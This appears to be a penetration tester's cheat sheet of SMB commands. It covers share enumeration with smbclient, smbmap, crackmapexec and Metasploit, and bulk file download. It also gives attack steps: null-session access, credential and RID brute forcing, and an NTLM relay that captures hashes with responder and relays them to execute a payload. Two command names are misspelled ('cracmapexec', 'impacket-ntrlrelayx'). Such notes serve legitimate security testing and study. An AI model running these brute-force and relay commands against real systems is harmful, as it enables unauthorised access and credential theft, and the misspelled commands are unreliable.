SMB

Server Message Block

Enumeration

smbclient

Without Credentials

smbclient --no-pass //IP/<Share>

Connect to share

smbclient -N \\\\IP\Share

List Resource list

smbclient -L <IP>

List Null session

smbclient -N <IP>

List Share

smbclient //IP/<SHARE> -U <USER>

smbmap

Connect to Host

smbmap -H <IP>

Connect with credentials

smbmap -H <IP> -d <dns> -u '<user>' -p '<pass>'

List Share

smbmap -H <IP> -r <SHARE>

crackmapexec

Connect to host

crackmapexec smb <IP>

List shares

crackmapexec smb <IP> -u '' -p '' --shares

Full Enumeration

crackmapexec smb <IP> -u <username> -p <password> --allinfo

Bruteforce credentials

cracmapexec smb <IP> -u usernames -p passwords

Brutefoce RID

crackmapexec smb <IP> -u <USER> -p <PASSWORD> --rid-brute

Deep Credential Bruteforce

crackmapexec smb <IP> -u usernames -p passwords --continue-on-success

RMU (Remote Management User)

crackmapexec winrm <IP> -u <USER> -p <PASSWORD>

impacket

Connect to server

impacket-smbclient <IP>/user:password@address

smbget

Download file

smbget -U <User> smb://IP/<SHARE_LOCATION> / --download

Metasploit

Select the module

use auxiliary/scanner/smb/smb_enumshares

Set target

set RHOSTS <target_ip>

Execute

run

---

To download files type this sequence of commands:

1

recurse

2

prompt

3

mget *

---

NTLM Relay Attacks

Capture the Hash

responder -I eth0 -dwv

Relay the hash

impacket-ntrlrelayx -tf target.txt -smb2support -c <payload>